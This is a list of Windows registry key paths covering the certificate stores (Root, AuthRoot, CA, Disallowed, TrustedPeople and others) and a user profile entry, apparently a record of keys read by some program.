HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1339698970-4093829097-1161395185-1000\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Keys
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CTLs
HKEY_CURRENT_USER\
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\1916A2AF346D399F50313C393200F14140456616
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\1916A2AF346D399F50313C393200F14140456616\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\2A83E9020591A55FC6DDAD3FB102794C52B24E70
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\2A83E9020591A55FC6DDAD3FB102794C52B24E70\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\2B84BFBB34EE2EF949FE1CBE30AA026416EB2216
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\2B84BFBB34EE2EF949FE1CBE30AA026416EB2216\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\305F8BD17AA2CBC483A4C41B19A39A0C75DA39D6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\305F8BD17AA2CBC483A4C41B19A39A0C75DA39D6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\367D4B3B4FCBBC0B767B2EC0CDB2A36EAB71A4EB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\367D4B3B4FCBBC0B767B2EC0CDB2A36EAB71A4EB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\3A850044D8A195CD401A680C012CB0A3B5F8DC08
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\3A850044D8A195CD401A680C012CB0A3B5F8DC08\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\40AA38731BD189F9CDB5B9DC35E2136F38777AF4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\40AA38731BD189F9CDB5B9DC35E2136F38777AF4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\43D9BCB568E039D073A74A71D8511F7476089CC3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\43D9BCB568E039D073A74A71D8511F7476089CC3\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\471C949A8143DB5AD5CDF1C972864A2504FA23C9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\471C949A8143DB5AD5CDF1C972864A2504FA23C9\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\51C3247D60F356C7CA3BAF4C3F429DAC93EE7B74
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\51C3247D60F356C7CA3BAF4C3F429DAC93EE7B74\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\5DE83EE82AC5090AEA9D6AC4E7A6E213F946E179
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\5DE83EE82AC5090AEA9D6AC4E7A6E213F946E179\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\61793FCBFA4F9008309BBA5FF12D2CB29CD4151A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\61793FCBFA4F9008309BBA5FF12D2CB29CD4151A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\63FEAE960BAA91E343CE2BD8B71798C76BDB77D0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\63FEAE960BAA91E343CE2BD8B71798C76BDB77D0\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\6431723036FD26DEA502792FA595922493030F97
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\6431723036FD26DEA502792FA595922493030F97\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\80962AE4D6C5B442894E95A13E4A699E07D694CF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\80962AE4D6C5B442894E95A13E4A699E07D694CF\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\86E817C81A5CA672FE000F36F878C19518D6F844
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\86E817C81A5CA672FE000F36F878C19518D6F844\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\8E5BD50D6AE686D65252F843A9D4B96D197730AB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\8E5BD50D6AE686D65252F843A9D4B96D197730AB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\9845A431D51959CAF225322B4A4FE9F223CE6D15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\9845A431D51959CAF225322B4A4FE9F223CE6D15\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\B533345D06F64516403C00DA03187D3BFEF59156
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\B533345D06F64516403C00DA03187D3BFEF59156\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\B86E791620F759F17B8D25E38CA8BE32E7D5EAC2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\B86E791620F759F17B8D25E38CA8BE32E7D5EAC2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\C060ED44CBD881BD0EF86C0BA287DDCF8167478C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\C060ED44CBD881BD0EF86C0BA287DDCF8167478C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\CEA586B2CE593EC7D939898337C57814708AB2BE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\CEA586B2CE593EC7D939898337C57814708AB2BE\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\D018B62DC518907247DF50925BB09ACF4A5CB3AD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\D018B62DC518907247DF50925BB09ACF4A5CB3AD\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\F8A54E03AADC5692B850496A4C4630FFEAA29D83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\F8A54E03AADC5692B850496A4C4630FFEAA29D83\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\FA6660A94AB45F6A88C0D7874D89A863D74DEE97
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\FA6660A94AB45F6A88C0D7874D89A863D74DEE97\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3B1EFD3A66EA28B16697394703A72CA340A05BD5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3B1EFD3A66EA28B16697394703A72CA340A05BD5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8F43288AD272F3103B6FB1428485EA3014C0BCFE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8F43288AD272F3103B6FB1428485EA3014C0BCFE\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3679CA35668772304D30A5FB873B0FA77BB70D54
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3679CA35668772304D30A5FB873B0FA77BB70D54\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4F65566336DB6598581D584A596C87934D5F2AB4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4F65566336DB6598581D584A596C87934D5F2AB4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4F65566336DB6598581D584A596C87934D5F2AB4\BlobCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4F65566336DB6598581D584A596C87934D5F2AB4\BlobLength
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\627F8D7827656399D27D7F9044C9FEB3F33EFA9A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\627F8D7827656399D27D7F9044C9FEB3F33EFA9A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\75E0ABB6138512271C04F85FDDDE38E4B7242EFE\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\ROOT\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\ROOT\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\ROOT\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\ROOT\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
